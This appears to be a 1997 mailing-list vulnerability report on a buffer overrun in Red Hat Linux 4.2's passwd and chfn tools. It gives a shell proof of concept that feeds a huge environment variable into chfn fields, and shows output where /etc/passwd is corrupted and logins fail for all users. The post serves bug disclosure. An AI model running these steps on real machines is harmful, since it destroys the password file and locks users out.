X-RDate: Mon, 22 Dec 1997 09:46:02 +0500 (ESK)
Date: Fri, 19 Dec 1997 07:37:49 -0600
From: Alex Mottram <[email protected]>
To: [email protected]Subject: Buffer Overrun / DOS in /bin/passwd (at least Redhat Linux 4.2)
I don't have the time to look into this much further, but it definitely
looks scarey. I've tried it on 3 machines, and they all produce the
same results. For what it's worth, all 3 machines were installed from
the Redhat PowerTools 4.2 CD and have applied all relevant patches
from ftp.redhat.com/pub/updates/4.2/i386/.
Configuration Information
---------------------------------------------
[alex@machine alex]$ cat /etc/redhat-release
release 4.2 (Biltmore)
rpm -qf /usr/bin/chfn
util-linux-2.5-38
rpm -qf /usr/bin/passwd
passwd-0.50-7
rpm -q pam
pam-0.57-4
[alex@machine alex]$ cat /etc/pam.conf
#
# THIS FILE IS NOW OBSOLETE
#
# The contents of this file should be replaced by files in the
# /etc/pam.d/ directory.
#
#
[alex@machine alex]$ ls /etc/pam.d/
chfn ftp login passwd rlogin samba xdm
chsh imap other rexec rsh su
[alex@machine alex]$ cat /etc/pam.d/chfn
#%PAM-1.0
auth required /lib/security/pam_pwdb.so shadow nullok
account required /lib/security/pam_pwdb.so
password required /lib/security/pam_cracklib.so
password required /lib/security/pam_pwdb.so shadow nullok
use_authtok
session required /lib/security/pam_pwdb.so
[alex@machine alex]$ cat /etc/pam.d/passwd
#%PAM-1.0
auth required /lib/security/pam_pwdb.so shadow nullok
account required /lib/security/pam_pwdb.so
password required /lib/security/pam_cracklib.so
password required /lib/security/pam_pwdb.so use_authtok nullok
[alex@machine /tmp]$ tail /etc/passwd
alex:x:500:500:alex,,,,:/home/alex:/bin/bash
zane:x:501:501:zane,,,,:/home/zane:/bin/bash
someone:x:502:502::/home/someone:/bin/bash
[alex@machine /tmp]$ cat pass
#this test has 11719 bytes of the sequence "0123456789", Xs work just as
well.
export -p BUFF='[many Xs, 10k is more than plenty, 2k should work]'
/bin/bash
[alex@machine /tmp]$ ./pass
[alex@machine /tmp]$ chfn -f $BUFF -p $BUFF -h $BUFF -o $BUFF
Changing finger information for alex.
Password:
Finger information changed.
[alex@machine /tmp]$ wc /etc/passwd
26 29 2068 /etc/passwd
** At this point, the passwd entry for 'alex' is >48k long **
[alex@machine alex]$ passwd
Changing password for alex
(current) UNIX password:
New UNIX password:
Segmentation fault
** LOGIN AS SECOND USER **
[zane@machine zane]$ passwd
Changing password for zane
(current) UNIX password:
New UNIX password:
Retype new UNIX password:
passwd: all authentication tokens updated successfully
** 'passwd' just snipped our one big line into nice 8k chunks
** and created some junk passwd file entries.
[zane@machine zane]$ wc /etc/passwd
31 34 47829 /etc/passwd
[zane@machine zane]$ su someuser
su: user someuser does not exist
[zane@machine zane]$ su alex
su: user alex does not exist
[zane@machine zane]$ su zane
su: user zane does not exist
Other services I checked were equally screwed. (ftp, pop-3, etc...)